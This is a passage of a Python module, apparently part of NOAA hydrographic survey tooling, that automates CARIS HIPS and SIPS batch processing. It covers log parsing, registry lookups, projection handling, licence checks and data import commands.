end': process_overview['ImportHIPSFromAuxiliaryAPP_RMS']['end'] = savemsg activeproc = 'ImportHIPSFromAuxiliaryAPP_RMS' elif rawmsg == 'Import Tide to HIPS start': process_overview['ImportTideToHIPS']['start'] = savemsg activeproc = 'ImportTideToHIPS' elif rawmsg == 'Import Tide to HIPS end': 
process_overview['ImportTideToHIPS']['end'] = savemsg activeproc = 'ImportTideToHIPS' elif rawmsg == 'Georeference Bathymetry start': process_overview['GeoreferenceHIPSBathymetry']['start'] = savemsg activeproc = 'GeoreferenceHIPSBathymetry' elif rawmsg == 'Georeference Bathymetry end': process_overview['GeoreferenceHIPSBathymetry']['end'] = savemsg activeproc = 'GeoreferenceHIPSBathymetry' elif rawmsg == 'Sound Velocity Correct using CARIS Algorithm start': process_overview['SoundVelocityCorrectHIPSWithCARIS']['start'] = savemsg activeproc = 'SoundVelocityCorrectHIPSWithCARIS' elif rawmsg == 'Sound Velocity Correct using CARIS Algorithm end': process_overview['SoundVelocityCorrectHIPSWithCARIS']['end'] = savemsg activeproc = 'SoundVelocityCorrectHIPSWithCARIS' elif rawmsg == 'Compute HIPS GPS Tide start': process_overview['ComputeHIPSGPSTide']['start'] = savemsg activeproc = 'ComputeHIPSGPSTide' elif rawmsg == 'Compute HIPS GPS Tide end': process_overview['ComputeHIPSGPSTide']['end'] = savemsg activeproc = 'ComputeHIPSGPSTide' elif rawmsg == 'Merge HIPS start': process_overview['MergeHIPS']['start'] = savemsg activeproc = 'MergeHIPS' elif rawmsg == 'Merge HIPS end': process_overview['MergeHIPS']['end'] = savemsg activeproc = 'MergeHIPS' elif rawmsg == 'Compute HIPS TPU start': process_overview['ComputeHIPSTPU']['start'] = savemsg activeproc = 'ComputeHIPSTPU' elif rawmsg == 'Compute HIPS TPU end': process_overview['ComputeHIPSTPU']['end'] = savemsg activeproc = 'ComputeHIPSTPU' elif rawmsg == 'Create HIPS Grid using CUBE start': process_overview['CreateHIPSGrid']['start'] = savemsg activeproc = 'CreateHIPSGrid' elif rawmsg == 'Create HIPS Grid using CUBE end': process_overview['CreateHIPSGrid']['end'] = savemsg activeproc = 'CreateHIPSGrid' elif rawmsg == 'Create SIPS Beam Pattern using Side Scan start': process_overview['CreateSIPSBeamPattern']['start'] = savemsg activeproc = 'CreateSIPSBeamPattern' elif rawmsg == 'Create SIPS Beam Pattern using Side Scan end': 
process_overview['CreateSIPSBeamPattern']['end'] = savemsg activeproc = 'CreateSIPSBeamPattern' elif rawmsg == 'Create SIPS Beam Pattern using Side Scan start': process_overview['CreateSIPSBeamPattern']['start'] = savemsg activeproc = 'CreateSIPSBeamPattern' elif rawmsg == 'Create SIPS Beam Pattern using Side Scan end': process_overview['CreateSIPSBeamPattern']['end'] = savemsg activeproc = 'CreateSIPSBeamPattern' elif rawmsg == 'Compute SIPS Towfish Navigation start': process_overview['ComputeSIPSTowfishNavigation']['start'] = savemsg activeproc = 'ComputeSIPSTowfishNavigation' elif rawmsg == 'Compute SIPS Towfish Navigation end': process_overview['ComputeSIPSTowfishNavigation']['end'] = savemsg activeproc = 'ComputeSIPSTowfishNavigation' elif rawmsg == 'Create SIPS Mosaic using SIPS Side Scan start': process_overview['CreateSIPSMosaic']['start'] = savemsg activeproc = 'CreateSIPSMosaic' elif rawmsg == 'Create SIPS Mosaic using SIPS Side Scan end': process_overview['CreateSIPSMosaic']['end'] = savemsg activeproc = 'CreateSIPSMosaic' elif l[0:7].lower() == 'warning': skip = False for ex in excludedwarnings: if l[len(l) - ex[1]:].rstrip() == ex[0]: skip = True if not skip: process_overview[activeproc]['warning'].append(l.rstrip()) for warn in warningdict: if (l.find(warn) != -1) and (warn not in alreadywarned): alreadywarned.append(warn) process_overview[activeproc]['warn_explain'].append([warn, warningdict[warn]]) elif l[0:5].lower() == 'error': process_overview[activeproc]['error'].append(l.rstrip()) for err in errordict: if (l.find(err) != -1) and (err not in alreadyerror): alreadyerror.append(err) process_overview[activeproc]['error_explain'].append([err, errordict[err]]) elif l[0:7] == 'POSMV: ': if l.find('SBET') != -1: sbetproc = True return process_overview, sbetproc def support_files_finder(command, suppress_exception=True): cubeparams = '' depth_coverage = '' depth_object = '' if command.startswith('"') and command.endswith('"'): command = command[1:-1] 
sys_dir = os.path.join(os.path.dirname(os.path.dirname(command)), 'system') xmlfiles = glob.glob(os.path.join(sys_dir, '*.xml')) txtfiles = glob.glob(os.path.join(sys_dir, '*.txt')) valid_cubeparams = ['CUBEParams_NOAA_2019.xml', 'CUBEParams_NOAA_2018.xml', 'CUBEParams_NOAA_2017.xml'] valid_depth_cc = ['NOAA_DepthRanges_CompleteCoverage_2019.txt', 'NOAA_DepthRanges_CompleteCoverage_2018.txt', 'NOAA_DepthRanges_CompleteCoverage_2017.txt'] valid_depth_obj = ['NOAA_DepthRanges_ObjectDetection_2019.txt', 'NOAA_DepthRanges_ObjectDetection_2018.txt', 'NOAA_DepthRanges_ObjectDetection_2017.txt'] for cbparams in valid_cubeparams: fullcb = os.path.join(sys_dir, cbparams) if fullcb in xmlfiles: cubeparams = fullcb break for depthcc in valid_depth_cc: fullcc = os.path.join(sys_dir, depthcc) if fullcc in txtfiles: depth_coverage = fullcc break for depthdo in valid_depth_obj: fulldo = os.path.join(sys_dir, depthdo) if fulldo in txtfiles: depth_object = fulldo break if cubeparams and depth_coverage and depth_object: return cubeparams, depth_coverage, depth_object else: if not suppress_exception: mess = "Caris Support Files not found at {}".format(sys_dir) raise Exception(mess) else: return cubeparams, depth_coverage, depth_object def command_finder_old(): # carisbatch finder, in case you installed somewhere dumb or don't have it installed at all name = 'carisbatch.exe' command = '' batch_engine = '' pathlist = [r'C:\Program Files\CARIS\HIPS and SIPS\10.4', r'C:\Program Files\CARIS\HIPS and SIPS\10.3', r'C:\Program Files\CARIS\HIPS and SIPS\10.2'] for path in pathlist: if os.path.exists(path): for root, dirs, files in os.walk(path, topdown=True): if name in files: batch_engine = os.path.join(root, name) break break if batch_engine: command = '"' + batch_engine + '"' else: raise Exception("No Batch Engine found...is CARIS installed at C:\Program Files\CARIS\HIPS and SIPS?") return command def caris_command_finder(exe_name, accepted_versions, app_key): batch_engine = '' vers = '' 
regHKLM = ConnectRegistry(None, HKEY_LOCAL_MACHINE) for vHIPS in accepted_versions: try: kBDB = OpenKey(regHKLM, os.sep.join(('SOFTWARE', 'CARIS', 'HIPS', vHIPS, 'Environment Variables'))) p2hipsinst = QueryValueEx(kBDB, "install_dir")[0] batch_engine = os.path.join(p2hipsinst, 'bin', exe_name) # if the carisbatch doesn't exist then continue to the next version of caris if not os.path.exists(batch_engine): continue vers = float(vHIPS) break except WindowsError: continue return batch_engine, vers def command_finder_hips(): batch_engine, vers = caris_command_finder('carisbatch.exe', ('11.2', '11.1', '10.4', '10.3', '10.2'), "HIPS") if not batch_engine: raise Exception("No Batch Engine found...is CARIS HIPS and SIPS installed?") return batch_engine, vers def command_finder_base(): batch_engine, vers = caris_command_finder('carisbatch.exe', ('5.3', '5.2', '5.1', '4.4', '4.3', '4.2'), 'BASE Editor') if not batch_engine: raise Exception("No Batch Engine found...is CARIS BASE Editor installed?") return batch_engine, vers def get_bands_from_csar(path_to_csar): """ Open a csar file and return the bands. Returns a list. 
For a sounding csar probably like this: ['Depth', 'Deep', 'Density', 'Hypothesis_Count', 'Hypothesis_Strength', 'Mean', 'Node_Std_Dev', 'Shoal', 'Std_Dev', 'Uncertainty', 'User_Nominated'] For a sidescan csar then something like this: ['Intensity', 'Density', 'Standard_Deviation', 'Weights'] """ grids = GridsManager() grids.add_path(path_to_csar) list(grids.grid_list) grids.set_current(path_to_csar) DEFAULT_CHUNK_SIZE = 1073741824 # 1GB 4294967296 # 4GB grids.open_to_read_current(DEFAULT_CHUNK_SIZE) return list(grids.layer_names()) def find_csar_band_name(csar, log=None): if os.path.splitext(csar)[1] == '.csar': # c = hydroffice.csar.raw.csar.CsarBase() band_names = get_bands_from_csar(csar) out = '' b = '' found = False out = 'Searching for VDatum bands "NAD83_MLLW" and "WGS84_MLLW"\n' for b in band_names: if b in ['NAD83-MLLW', 'WGS84-MLLW', 'NAD83_MLLW', 'WGS84_MLLW']: out += 'found VDatum band {}'.format(b) found = True break if not found: out += 'Searching for other NAD83/WGS84 prefixed band names\n' for b in band_names: if b[0:6] in ['NAD83_', 'WGS84_']: out += 'found VDatum band {}'.format(b) found = True break if not found: out += 'Searching for VDatum bands "Elevation", "Datum Height" and "Height"\n' for b in band_names: if b in ['Datum Height', 'Elevation', 'Height']: out += 'found VDatum band {}'.format(b) found = True break if not found: out += 'Searching for VDatum bands "Depth"\n' for b in band_names: if b in ['Depth']: out += 'found VDatum band {}'.format(b) found = True break if not found: out += 'Could not find expected VDatum band. 
Need NAD83-MLLW, WGS84-MLLW, Elevation, Height or Datum Height.\n' out += 'Found {}'.format(band_names) b = '' if log: with open(log, 'a+') as logger: print(out, file=logger) print(out) return b elif os.path.splitext(csar)[1] == '.asc': if log: with open(log, 'a+') as logger: print("Found .asc file: using 'Band 1' band name", file=logger) print("Found .asc file: using 'Band 1' band name") return 'Band 1' else: if log: with open(log, 'a+') as logger: print("File format unsupported: Require .asc or .csar file", file=logger) print("File format unsupported: Require .asc or .csar file") return '' def proj_to_epsg(coord, proj): if coord == 'NAD83': zone = proj[9:len(proj) - 1] if len(zone) == 2: return '269' + zone elif len(zone) == 1: return '2690' + zone else: raise IOError('Invalid projection: {}, {}'.format(coord, proj)) elif coord == 'WGS84': zone = proj[9:len(proj) - 1] if len(zone) == 2: return '326' + zone elif len(zone) == 1: return '3260' + zone else: raise IOError('Invalid projection: {}, {}'.format(coord, proj)) else: raise IOError('Invalid coordinate system: {}'.format(coord)) def wgs84_epsg_utmzone_finder(maxlon, minlon): maxlon = int(maxlon) minlon = int(minlon) msg = '' maxlon_zone = str(30 - ((int(maxlon) * -1) / 6)) if len(str(maxlon_zone)) == 1: maxlon_zone = '3260' + str(maxlon_zone) else: maxlon_zone = '326' + str(maxlon_zone) minlon_zone = str(30 - ((int(minlon) * -1) / 6)) if len(str(minlon_zone)) == 1: minlon_zone = '3260' + str(minlon_zone) else: minlon_zone = '326' + str(minlon_zone) if int(maxlon_zone) != int(minlon_zone): msg = 'Spanning more than one UTM zone: {}, {}'.format(minlon_zone, maxlon_zone) return maxlon_zone, msg def nad83_epsg_utmzone_finder(maxlon, minlon): maxlon = int(maxlon) minlon = int(minlon) msg = '' maxlon_zone = str(30 - ((int(maxlon) * -1) / 6)) if len(str(maxlon_zone)) == 1: maxlon_zone = '2690' + str(maxlon_zone) else: maxlon_zone = '269' + str(maxlon_zone) minlon_zone = str(30 - ((int(minlon) * -1) / 6)) if 
len(str(minlon_zone)) == 1: minlon_zone = '2690' + str(minlon_zone) else: minlon_zone = '269' + str(minlon_zone) if int(maxlon_zone) != int(minlon_zone): msg = 'Spanning more than one UTM zone: {}, {}'.format(minlon_zone, maxlon_zone) return maxlon_zone, msg def proj_from_svp(svp_path): if svp_path.endswith(".svp"): with open(svp_path, 'r') as svp: version = svp.readline() name = svp.readline() header = svp.readline() try: section, date, lat, int = [header.split()[i] for i in [1, 2, 3, 4]] except: error = 'Error reading {}\n'.format(svp_path) error += 'Please verify that the svp file has the correct header' raise IOError(error) degree_long = int.split(':')[0] lon_zone = str(30 - ((int(degree_long) * -1) / 6)) if lat[0] == '-': return 'UTM Zone ' + lon_zone + 'S' return 'UTM Zone ' + lon_zone + 'N' else: return '' # helper function to retrieve the path to the NOAA folder in PydroXL def retrieve_noaa_folder_path(): folder_path = HSTB.resources.path_to_HSTB() if not os.path.exists(folder_path): raise RuntimeError("the folder does not exist: %s" % folder_path) # print "NOAA folder: {}".format(folder_path) return folder_path # helper function to retrieve the install prefix path for PydroXL def retrieve_install_prefix(): folder_path = HSTB.resources.path_to_root_env() if not os.path.exists(folder_path): raise RuntimeError("the folder does not exist: %s" % folder_path) # print "install prefix: %s" % folder_path return folder_path # helper function to retrieve the path to the "Scripts" folder in PydroXL def retrieve_scripts_folder(): folder_path = HSTB.resources.path_to_root_env("Scripts") if not os.path.exists(folder_path): raise RuntimeError("the folder does not exist: %s" % folder_path) # print "scripts folder: %s" % folder_path return folder_path # helper function to retrieve the path to the "activate.bat" batch file in PydroXL def retrieve_activate_batch(): scripts_prefix = retrieve_scripts_folder() file_path = os.path.realpath(os.path.join(scripts_prefix, 
"activate.bat")) if not os.path.exists(file_path): raise RuntimeError("the file does not exist: %s" % file_path) # print "activate batch file: %s" % file_path return file_path class CarisAPI(): def __init__(self, processtype='', hdcs_folder='', hvf='', project_name='', sheet_name='', vessel_name='', day_num='', input_format='', logger=os.path.join(os.path.dirname(__file__), 'log.txt'), benchcsv='', coord_mode='', proj_mode='', noaa_support_files=False, benchfrom='', benchto='', benchtoraw='', bench=True, progressbar=None, base=False, hipsips=True): self.benchclass = benchmark.Benchmark(benchfrom, benchto, benchtoraw) self.benchfrom = benchfrom self.benchto = benchto self.benchtoraw = benchtoraw self.progressbar = progressbar self.processtype = processtype self.hdcs_folder = hdcs_folder self.hvf = hvf self.project_name = project_name self.sheet_name = sheet_name self.vessel_name = vessel_name self.day_num = day_num self.onlysurface_additionalvessel = '' self.noaa_support_files = noaa_support_files if hipsips: self.hipscommand, self.hipsversion = command_finder_hips() self.hdcsio_read = hdcsio_read() if self.noaa_support_files: self.cubeparams, self.depth_coverage, self.depth_object = support_files_finder(self.hipscommand) else: self.hipscommand, self.hipsversion = '', '' if base: self.basecommand, self.baseversion = command_finder_base() else: self.basecommand, self.baseversion = '', '' self.bathy_type = 'MULTIBEAM' self.input_format = input_format self.logger = logger self.bench = bench self.benchcsv = benchcsv self.converted_lines = [] self.coord = coord_mode self.proj = proj_mode self.proj_to_epsg = proj_to_epsg self.totalmiles = '' self.starttime = '' self.endtime = '' self.totaltime = '' def enqueue_output(self, out, queue): for line in iter(out.readline, ''): queue.put(line) out.close() def run_this_old_old(self, fullcommand): p = subprocess.Popen(fullcommand, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True) while p.poll() is None: if 
self.progressbar: self.progressbar.UpdatePulse('Running Caris Processes') for line in iter(p.stdout.readline, b''): print((">>> " + line.rstrip())) def run_this(self, fullcommand): with open(self.logger, 'a+') as log: # log.write(fullcommand) p = subprocess.Popen(fullcommand, stdout=log, stderr=log) while p.poll() is None: if self.progressbar: self.progressbar.UpdatePulse('Running Caris Processes') time.sleep(.1) def run_this_old_old_old_old(self, fullcommand): log = open(self.logger, 'a+') log.write(fullcommand) templog = open('templog.txt', 'wb') p = subprocess.Popen(fullcommand, stdout=templog, stderr=subprocess.STDOUT) readtemp = open('templog.txt', 'r') while p.poll() is None: if self.progressbar: self.progressbar.UpdatePulse('Running Caris Processes') t = readtemp.read() if t: print(t) log.write(t) time.sleep(.1) t = readtemp.read() if t: print(t) log.write(t) readtemp.close() templog.close() os.remove('templog.txt') def run_this_old(self, fullcommand): p = subprocess.Popen(fullcommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True) output, errors = p.communicate() log = open(self.logger, 'a+') print(output) print(output, file=log) print(errors) print(errors, file=log) def run_this_old_old_old(self, fullcommand): log = open(self.logger, 'w+') p = subprocess.Popen(fullcommand, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, close_fds=ON_POSIX) q = Queue() t = threading.Thread(target=self.enqueue_output, args=(p.stdout, q)) # t.daemon() t.start() while t.isAlive(): if self.progressbar: self.progressbar.UpdatePulse('Running Caris Processes') try: line = q.get(timeout=.1) except Empty: pass else: print(line, end=' ') print(line, end=' ', file=log) def caris_hips_license_check(self, printout=True): fullcommand = self.hipscommand + ' --version' test = -1 out = subprocess.Popen(fullcommand, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) out = out.stdout.read() out = out.splitlines() # first stage: Just see if the modules are 
enabled, will at least see if they configured Caris to run if printout: if self.logger is not None: if not os.path.exists(os.path.split(self.logger)[0]): os.makedirs(os.path.split(self.logger)[0]) with open(self.logger, 'a+') as log: print('\n'.join(out)) print('\n'.join(out), file=log) print('\n****************************************************\n') print('\n****************************************************\n', file=log) else: out.append('\nUnable to access log file: {}\n'.format(self.logger)) for line in out: if line[:4] == 'HIPS': test = line.find('Yes') break if test == -1: return False, out else: # second stage: Try to write a csar to see if you are licensed car = CarisAPI(bench=False) tstsrc = os.path.join(charlene_test_folder, 'tstraster.csar') desttif = os.path.join(charlene_test_folder, 'delete_me.tif') if os.path.exists(desttif): os.remove(desttif) car.export_raster(tstsrc, 'GeoTIFF', desttif) if os.path.exists(desttif): os.remove(desttif) return True, out else: out = ['License check failed: Ensure that modules are enabled in Caris and a valid license is activated.'] return False, out def caris_base_license_check(self, printout=True): # if not already enabled, enable base if not self.basecommand: self.basecommand, self.baseversion = command_finder_base() if not self.basecommand: out = 'License check failed: Base switch not set in CarisAPI and no valid Base Editor command found.' 
return False, out fullcommand = self.basecommand + ' --version' test = -1 out = subprocess.Popen(fullcommand, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) out = out.stdout.read() out = out.splitlines() # first stage: Just see if the modules are enabled, will at least see if they configured Caris to run if printout: if self.logger is not None: if not os.path.exists(os.path.split(self.logger)[0]): os.makedirs(os.path.split(self.logger)[0]) with open(self.logger, 'a+') as log: print('\n'.join(out)) print('\n'.join(out), file=log) print('\n****************************************************\n') print('\n****************************************************\n', file=log) else: out.append('\nUnable to access log file: {}\n'.format(self.logger)) for line in out: if line[:15] == 'Feature Editing': test = line.find('Yes') break # They changed the fucking name to 'BASE Editor', of course, in 5.3 the jerks elif line[:11] == 'BASE Editor': test = line.find('Yes') break if test == -1: return False, out else: # second stage: Try to write a csar to see if you are licensed car = CarisAPI(bench=False, base=True, hipsips=False) tstsrc = os.path.join(charlene_test_folder, 'tstraster.csar') desttif = os.path.join(charlene_test_folder, 'delete_me.tif') if os.path.exists(desttif): os.remove(desttif) car.export_raster(tstsrc, 'GeoTIFF', desttif, forcebase=True) if os.path.exists(desttif): os.remove(desttif) return True, out else: print(out) out = ['License check failed: Ensure that modules are enabled in Caris and a valid license is activated.'] return False, out def processlog_read(self, transferstats, options): if self.hipsversion < 11: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name, self.vessel_name, self.day_num) # querybyline not supported, don't use the converted_lines stuff convlines = [] else: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name) convlines = self.converted_lines #history_dict, process_history, self.starttime, self.endtime, self.totaltime, 
self.totalmiles, data, hdcsio_lnm, extent_stats = read_stats_from_hdcs(hdcspath) hdcsstats = read_stats_from_hdcs(hdcspath, self.hipsversion) if hdcsstats: self.starttime = hdcsstats['starttime'] self.endtime = hdcsstats['endtime'] self.totaltime = hdcsstats['totaltime'] self.totalmiles = hdcsstats['totalmiles'] hips = os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips') thr = threading.Thread(target=processing_report.process_reader, args=(self.processtype, hdcsstats['history_dict'], self.starttime, self.endtime, self.totaltime, self.totalmiles, hdcsstats['extent_stats'], self.project_name, self.sheet_name, self.vessel_name, self.day_num, self.logger, transferstats, hdcspath, hips, options['acqcomments'], self.hipsversion, convlines)) thr.start() while thr.isAlive(): if self.progressbar: self.progressbar.UpdatePulse('Generating Log...') time.sleep(.1) carislog_summary, sbetproc = parse_charlene_carislog(options['carislogger']) thr = threading.Thread(target=processing_report.end_status_report, args=(self.processtype, hdcsstats['history_dict'], self.vessel_name, self.day_num, self.logger, transferstats, hdcspath, hips, carislog_summary, sbetproc, self.hipsversion, convlines)) thr.start() while thr.isAlive(): if self.progressbar: self.progressbar.UpdatePulse('Generating Status Report...') time.sleep(.1) def create_new_hips_project(self): hipsfile = os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips') epsg = proj_to_epsg(self.coord, self.proj) if not os.path.exists(hipsfile): fullcommand = self.hipscommand + ' --run CreateHIPSFile --output-crs EPSG:' + epsg + ' "' + hipsfile + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def convert_mbes(self, raw_file, kongs_height='EM_HEIGHT', overwrite=False): '''Runs ImporttoHIPS with all options. 
Example: carisbatch.exe --run ImportToHIPS --input-format HYPACK --convert-bathymetry MULTIBEAM C:\HIPSData\PreProcess\000_1111.HSX file:///C:/HIPSData/HDCS_Data/Test/ Test.hips?Vessel=HypackVessel2017;Day=2017-006''' rawfiles = '' epsg = proj_to_epsg(self.coord, self.proj) if self.hipsversion < 11: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name, self.vessel_name, self.day_num) else: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name) for line in raw_file: rawfiles += '"' + line + '" ' tempraw = os.path.split(line)[1] line_path = os.path.join(hdcspath, tempraw[:len(tempraw) - 4]) self.converted_lines.append(line_path) fullcommand = self.hipscommand + ' --run ImportToHIPS --input-format ' + self.input_format fullcommand += ' --input-crs EPSG:' + epsg if self.hipsversion >= 11: fullcommand += ' --vessel-file "' + self.hvf + '"' if overwrite: fullcommand += ' --overwrite BATHY --overwrite NAVIGATION --overwrite MOTION' if self.input_format == 'HYPACK': fullcommand += ' --convert-bathymetry ' + self.bathy_type + ' ' + rawfiles elif self.input_format == 'KONGSBERG': fullcommand += ' --convert-navigation --gps-height-device ' + kongs_height + ' ' + rawfiles elif self.input_format == 'TELEDYNE_7k': fullcommand += ' --navigation-device POSITION --heading-device HEADING --motion-device RPH' fullcommand += ' --swath-device BATHYMETRY ' + rawfiles elif self.input_format == 'GSF': fullcommand += ' --depth-source TRUE ' + rawfiles fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips') if self.hipsversion < 11: fullcommand += '?Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' else: fullcommand += '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def daynum_extents(self, epsg, overwritelines=[]): lat = [] lon = [] msg = '' if self.hipsversion < 11: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name, self.vessel_name, 
self.day_num) else: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name) if self.converted_lines == []: for folder in os.listdir(hdcspath): line_path = os.path.join(hdcspath, folder) if os.path.isdir(line_path): self.converted_lines.append(line_path) if overwritelines: # keep only converted lines that match raw data (overwritelines is raw data, converted_lines are hdcs) keep_lines = [] for procline in self.converted_lines: procfolder = os.path.split(procline)[1] for rawfile in overwritelines: rawfilename = os.path.splitext(os.path.split(rawfile)[1])[0] if procfolder == rawfilename: keep_lines.extend([procline]) break print('AM_PM_LineFinder: Found {} lines for the day, running on {} lines'.format(len(self.converted_lines), (len(keep_lines)))) self.converted_lines = keep_lines nav = self.hdcsio_read for hdcsline in self.converted_lines: try: navdata = nav.ReadTimeSeries(hdcsline) lat.append(np.rad2deg(navdata[:, 1].max())) lat.append(np.rad2deg(navdata[:, 1].min())) lon.append(np.rad2deg(navdata[:, 2].max())) lon.append(np.rad2deg(navdata[:, 2].min())) except: raise Exception('Unable to read navigation from line {}'.format(hdcsline)) lat = np.array(lat) lon = np.array(lon) '''if self.coord == 'NAD83': epsg, msg = nad83_epsg_utmzone_finder(lon.max(), lon.min()) elif self.coord == 'WGS84': epsg, msg = wgs84_epsg_utmzone_finder(lon.max(), lon.min()) else: raise Exception("Unknown coordinate system. 
Please use NAD83 or WGS84.") if msg: with open(self.logger, 'a+') as log: log.write(msg) print msg''' outproj = Proj(init='epsg:' + str(epsg)) inproj = Proj(init='epsg:4326') # WGS84 lowxextent, lowyextent = lon.min(), lat.min() highxextent, highyextent = lon.max(), lat.max() lowxextent_final, lowyextent_final = transform(inproj, outproj, lowxextent, lowyextent) highxextent_final, highyextent_final = transform(inproj, outproj, highxextent, highyextent) return str(epsg), str(lowxextent_final - 2000), str(lowyextent_final - 2000), \ str(highxextent_final + 2000), str(highyextent_final + 2000) def tcari_tides(self, tcarifile, mode): if _TCARI_CONVERTED: count = 0 fstr = '' pre_msgs = [] post_msgs = [] lines = self.converted_lines tc = TCARI.LoadTCARIFile(tcarifile) tidetypes = {"Observed": tidestation.TideStation.OBSERVED, "Verified": tidestation.TideStation.VERIFIED, "Predicted": tidestation.TideStation.GENERATED} tidetype = tidetypes[mode] if lines: with open(self.logger, 'a+') as log: startmsg = '*******Running TCARI Tide Processor*******\r\n' print(startmsg) log.write(startmsg) # tidetype = self.tcaridata.ChooseTideTypeIfMultiple(self) nav = HDCSio.HDCSNav('Navigation') times = [] remove_paths = [] for path in lines: try: o = nav.ReadTimeSeries(path) if len(o) > 0: times.append([o[:, 0].min(), o[:, 0].max()]) except: msg = "Error reading data from:'%s'\nRemoving path '%s'\n" % (path, path) print(msg) log.write(msg) remove_paths.append(path) pre_msgs.append(msg) count += 1 for path in remove_paths: lines.remove(path) if times: if tidetype != tidestation.TideStation.GENERATED: t = np.array(times, np.float64) mintime, maxtime = UTCs80ToDateTime(t[:, 0].min()), UTCs80ToDateTime(t[:, 1].max()) begindate = mintime - datetime.timedelta(360. / (24 * 60)) enddate = maxtime + datetime.timedelta(360. 
/ (24 * 60)) # add buffer for AutoQC, as pos files could exist outside of caris min/max time begindate -= datetime.timedelta(hours=3) enddate += datetime.timedelta(hours=3) thr = threading.Thread(target=tc.DownloadWLData, kwargs={ 'begindate': begindate, 'enddate': enddate, 'tidetype': tidetype, 'bShowProgress': False}) thr.start() while thr.isAlive(): if self.progressbar: self.progressbar.UpdatePulse('Running Pydro TCARI') time.sleep(.1) bPred = False else: bPred = True automation_args = [] thr = threading.Thread(target=TCARI.TideCorrectHDCS, args=(tc, lines), kwargs={ 'bPredicted': bPred, 'tidetype': tidetype, 'bShowLog': False, 'bWarnOutOfGrid': False, 'automation_args': automation_args}) thr.start() while thr.isAlive(): if self.progressbar: self.progressbar.UpdatePulse('Running Pydro TCARI') time.sleep(.1) try: fstr = automation_args[0] tcnt = automation_args[1] except: pass else: count += tcnt else: print(("Caris navigation data missing. \n" + "Either the files could not be read or the data was corrupt.")) if fstr: tcaris_msgs = open(fstr, "rb").read() else: h, fstr = tempfile.mkstemp('.log.txt', 'TC_') os.close(h) tcaris_msgs = "" outf = open(fstr, 'wb') outf.write("\n".join(pre_msgs)) outf.write(tcaris_msgs) outf.write("\n".join(post_msgs)) outf.close() log.write("\n".join(pre_msgs)) log.write(tcaris_msgs) log.write("\n".join(post_msgs)) if count > 0: print() "There were errors or warnings in creating the HDCS tides.\nSee the Charlene caris_log file for more information." endmsg = '*******TCARI Tide Processor Complete*******\r\n' print(endmsg) log.write(endmsg) TCARI.SaveTCARIFile(tc, tcarifile) return fstr else: raise NotImplementedError("TCARI is not in Python 3 yet") def convert_sss(self, raw_file, overwrite=False): '''Runs ImporttoHIPS with all options. 
Example: carisbatch.exe --run ImportToHIPS --input-format KLEIN --convert-side-scan HIGH --pressure-sensor-psi 300 --pressure-sensor-range 05 C:\HIPSData\PreProcess\000_1111.HSX file:///C:/HIPSData/HDCS_Data/Test/Test.hips?Vessel=HypackVessel2017;Day=2017-006''' epsg = proj_to_epsg(self.coord, self.proj) rawfiles = '' if self.hipsversion < 11: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name, self.vessel_name, self.day_num) else: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name) for line in raw_file: rawfiles += '"' + line + '" ' tempraw = os.path.split(line)[1] line_path = os.path.join(hdcspath, tempraw[:len(tempraw) - 4]) self.converted_lines.append(line_path) fullcommand = self.hipscommand + ' --run ImportToHIPS --input-format ' + self.input_format fullcommand += ' --input-crs EPSG:' + epsg if self.hipsversion >= 11: fullcommand += ' --vessel-file "' + self.hvf + '"' if overwrite: fullcommand += ' --overwrite SIDE_SCAN --overwrite NAVIGATION --overwrite MOTION' if self.input_format == 'KLEIN': fullcommand += ' --convert-side-scan HIGH' fullcommand += ' --pressure-sensor-psi 300 --pressure-sensor-range 05 ' elif self.input_format == 'EDGETECH_JSF': fullcommand += ' --sensor-altitude-location SENSOR --convert-from-cable-out' fullcommand += ' --sensor-depth-location SENSOR ' elif self.input_format == 'XTF': fullcommand += ' --convert-side-scan 12 --convert-layback-cable-out CABLEOUT ' elif self.input_format == 'HYPACK_HIGH': fullcommand = self.hipscommand + ' --run ImportToHIPS --input-format HYPACK' fullcommand += ' --input-crs EPSG:' + epsg if self.hipsversion >= 11: fullcommand += ' --vessel-file "' + self.hvf + '"' if overwrite: fullcommand += ' --overwrite SIDE_SCAN --overwrite NAVIGATION --overwrite MOTION' fullcommand += ' --convert-side-scan HIGH --convert-bathymetry NONE --convert-from-cable-out' fullcommand += ' --navigation-device 0 --heading-device 0 --port-device 1 --ss-position-device 2 ' elif self.input_format == 'HYPACK_LOW': 
fullcommand = self.hipscommand + ' --run ImportToHIPS --input-format HYPACK' fullcommand += ' --input-crs EPSG:' + epsg if self.hipsversion >= 11: fullcommand += ' --vessel-file "' + self.hvf + '"' if overwrite: fullcommand += ' --overwrite SIDE_SCAN --overwrite NAVIGATION --overwrite MOTION' fullcommand += ' --convert-side-scan LOW --convert-bathymetry NONE --convert-from-cable-out' fullcommand += ' --navigation-device 0 --heading-device 0 --port-device 1 --ss-position-device 2 ' fullcommand += rawfiles fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips') if self.hipsversion < 11: fullcommand += '?Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' else: fullcommand += '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def create_beampattern(self, type, bbpfile, querybyline=False): '''Runs CreateSIPSBeamPattern with all the options. Example: carisbatch.exe --run CreateSIPSBeamPattern --mosaic-engine SIPS_BACKSCATTER --beam-pattern-file 